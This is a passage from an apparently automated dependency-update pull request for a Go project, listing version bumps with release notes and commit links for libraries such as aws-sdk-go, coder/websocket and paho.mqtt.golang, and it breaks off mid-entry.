|\n| [github.com/klauspost/compress](https://github.com/klauspost/compress) | `1.18.0` | `1.18.5` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.1` |\n| [github.com/nats-io/nats-server/v2](https://github.com/nats-io/nats-server) | `2.11.4` | `2.12.6` |\n| [github.com/prometheus/client_golang](https://github.com/prometheus/client_golang) | `1.22.0` | `1.23.2` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.11.0` | `9.18.0` |\n| [github.com/spf13/cast](https://github.com/spf13/cast) | `1.9.2` | `1.10.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.9.1` | `1.10.2` |\n| [github.com/spf13/viper](https://github.com/spf13/viper) | `1.20.1` | `1.21.0` |\n| [github.com/throttled/throttled/v2](https://github.com/throttled/throttled) | `2.13.0` | `2.15.0` |\n| [github.com/uptrace/bun](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/dialect/pgdialect](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/driver/pgdriver](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc](https://github.com/open-telemetry/opentelemetry-go) | `1.37.0` | `1.42.0` |\n| [go.thethings.network/lorawan-stack-legacy/v2](https://github.com/TheThingsNetwork/lorawan-stack) | `2.1.0` | `2.1.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.0` | `1.27.1` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.35.0` | `0.36.0` |\n\n\nUpdates `github.com/KimMachineGun/automemlimit` from 0.7.4 to 0.7.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KimMachineGun/automemlimit/releases\"\u003egithub.com/KimMachineGun/automemlimit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003eKimMachineGun/automemlimit#31\u003c/a\u003e) by \u003ca href=\"https://github.com/KimMachineGun\"\u003e\u003ccode\u003e@​KimMachineGun\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003ehttps://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ehttps://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003e\u003ccode\u003e6d12049\u003c/code\u003e\u003c/a\u003e fix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003e#31\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.29.12 to 1.32.13\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.29.12...config/v1.32.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.78.2 to 1.97.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.78.2...service/s3/v1.97.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/coder/websocket` from 1.8.13 to 1.8.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coder/websocket/releases\"\u003egithub.com/coder/websocket's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.8.14\u003c/h2\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match Origin scheme if defined in OriginPatterns by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/536\"\u003ecoder/websocket#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine by \u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads by \u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: update to Go 1.23 by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/524\"\u003ecoder/websocket#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: add Makefile by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/525\"\u003ecoder/websocket#525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update LICENSE file by \u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: apply various modernisations by \u003ca href=\"https://github.com/Jacalz\"\u003e\u003ccode\u003e@​Jacalz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/531\"\u003ecoder/websocket#531\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ehttps://github.com/coder/websocket/compare/v1.8.13...v1.8.14\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/7d7c644330e727379c3e33fddc154ac208b925f3\"\u003e\u003ccode\u003e7d7c644\u003c/code\u003e\u003c/a\u003e refactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/535\"\u003e#535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/c7846ea6a8849fe21aed3b8319bac906e8cb1dca\"\u003e\u003ccode\u003ec7846ea\u003c/code\u003e\u003c/a\u003e refactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/e11dd4e741173381256344d57b3bfc3fa38a9d25\"\u003e\u003ccode\u003ee11dd4e\u003c/code\u003e\u003c/a\u003e fix: match Origin scheme if defined in OriginPatterns (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/536\"\u003e#536\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/91013c129147ee6375b65cf150fa151d2fcc0bce\"\u003e\u003ccode\u003e91013c1\u003c/code\u003e\u003c/a\u003e chore: apply various modernisations (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/efb626be44240d7979b57427265d9b6402166b96\"\u003e\u003ccode\u003eefb626b\u003c/code\u003e\u003c/a\u003e chore: update LICENSE file (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/526\"\u003e#526\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/246891f172ef96b0b5681c8e4d59dfd32ad1b091\"\u003e\u003ccode\u003e246891f\u003c/code\u003e\u003c/a\u003e build: add Makefile (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/778d161bfd21f3cfa8052d8b84e8c86e08ce41c7\"\u003e\u003ccode\u003e778d161\u003c/code\u003e\u003c/a\u003e build: update to Go 1.23 (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/524\"\u003e#524\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/eclipse/paho.mqtt.golang` from 1.5.0 to 1.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/releases\"\u003egithub.com/eclipse/paho.mqtt.golang's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.1\u003c/h2\u003e\n\u003cp\u003eThis is a minor release incorporating changes made in the 14 months since v1.5.0 (including updating dependencies, and raising the Go version to 1.24). The changes are relatively minor but address a potential security issue (\u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e), possible panic, enable users to better monitor the connection status, and incorporate a few optimisations.\u003c/p\u003e\n\u003cp\u003eThanks to those who have provided fixes/enhancements included in this release!\u003c/p\u003e\n\u003cp\u003eSpecial thanks to Paul Gerste at \u003ca href=\"https://www.sonarsource.com/\"\u003eSonar\u003c/a\u003e for reporting issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e via the Eclipse security team (fix was implemented in PR \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/714\"\u003e#714\u003c/a\u003e in May, github issue created just prior to this release). This issue arose where a topic \u0026gt; 65535 bytes was passed to the \u003ccode\u003ePublish\u003c/code\u003e function, due to the way the data was encoded the topic could leak into the message body. Please see issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e or \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e for further details.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdating go dependencies from pub and sub into the containers before building by \u003ca href=\"https://github.com/JefJrFigueiredo\"\u003e\u003ccode\u003e@​JefJrFigueiredo\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/691\"\u003eeclipse-paho/paho.mqtt.golang#691\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize TCP connection logic by \u003ca href=\"https://github.com/geekeryy\"\u003e\u003ccode\u003e@​geekeryy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/713\"\u003eeclipse-paho/paho.mqtt.golang#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFields over 65535 bytes not encoded correctly by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/714\"\u003eeclipse-paho/paho.mqtt.golang#714\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReduce slice allocations in route dispatch  by \u003ca href=\"https://github.com/alespour\"\u003e\u003ccode\u003e@​alespour\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/710\"\u003eeclipse-paho/paho.mqtt.golang#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd a ConnectionNotificationHandler by \u003ca href=\"https://github.com/RangelReale\"\u003e\u003ccode\u003e@​RangelReale\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/727\"\u003eeclipse-paho/paho.mqtt.golang#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePotential panic when using manual ACK by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/729\"\u003eeclipse-paho/paho.mqtt.golang#729\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ehttps://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/b30523793968e6b7a7b1f76338a58c4fe9755299\"\u003e\u003ccode\u003eb305237\u003c/code\u003e\u003c/a\u003e Update dependencies in docker examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/35ee03d8496f3256cc2bf7af15fea56e21c29c96\"\u003e\u003ccode\u003e35ee03d\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/433bd22ae6ac92daf00d575def72e425bc21e39f\"\u003e\u003ccode\u003e433bd22\u003c/code\u003e\u003c/a\u003e address data race in test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/4debe3a76a5aa8f27a2616e2d4e3fc53be0dc788\"\u003e\u003ccode\u003e4debe3a\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/601453b38642642382165ab9689b20cd025d102a\"\u003e\u003ccode\u003e601453b\u003c/code\u003e\u003c/a\u003e Resolve issues in fvt_client_test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/439e2ab4c07d55c124fe03e8bb6273b93c88b61a\"\u003e\u003ccode\u003e439e2ab\u003c/code\u003e\u003c/a\u003e Dependency update (also rise Go version to 1.24)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/d27659335abe44a2838ac4c8e807dd66ee208ed0\"\u003e\u003ccode\u003ed276593\u003c/code\u003e\u003c/a\u003e ConnectionNotificationHandler - generic callback for all types of connection ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/8a350a9cff7682fc5d8d741b6e9c5b7def7b2661\"\u003e\u003ccode\u003e8a350a9\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/5620c5ed09ab99bde96402f052e548fd95d4e0c3\"\u003e\u003ccode\u003e5620c5e\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/45048ccc79f333b4ac41ab1723aa94d63fb5ed01\"\u003e\u003ccode\u003e45048cc\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/emersion/go-smtp` from 0.22.0 to 0.24.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/ab24fe7cbe995d404af3b1c093195f2f43b94688\"\u003e\u003ccode\u003eab24fe7\u003c/code\u003e\u003c/a\u003e Remove superfluous validateLine() calls in sendMail()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/6944e3381b812d9b418405939b07780809df6c82\"\u003e\u003ccode\u003e6944e33\u003c/code\u003e\u003c/a\u003e Implement MT-PRIORITY (RFC 6710)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/54dd31d837eeef5d7d699c352bd03a8b4591e5d7\"\u003e\u003ccode\u003e54dd31d\u003c/code\u003e\u003c/a\u003e Implement DELIVERBY (RFC 2852)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/emersion/go-smtp/compare/v0.22.0...v0.24.0\"\u003ecompare 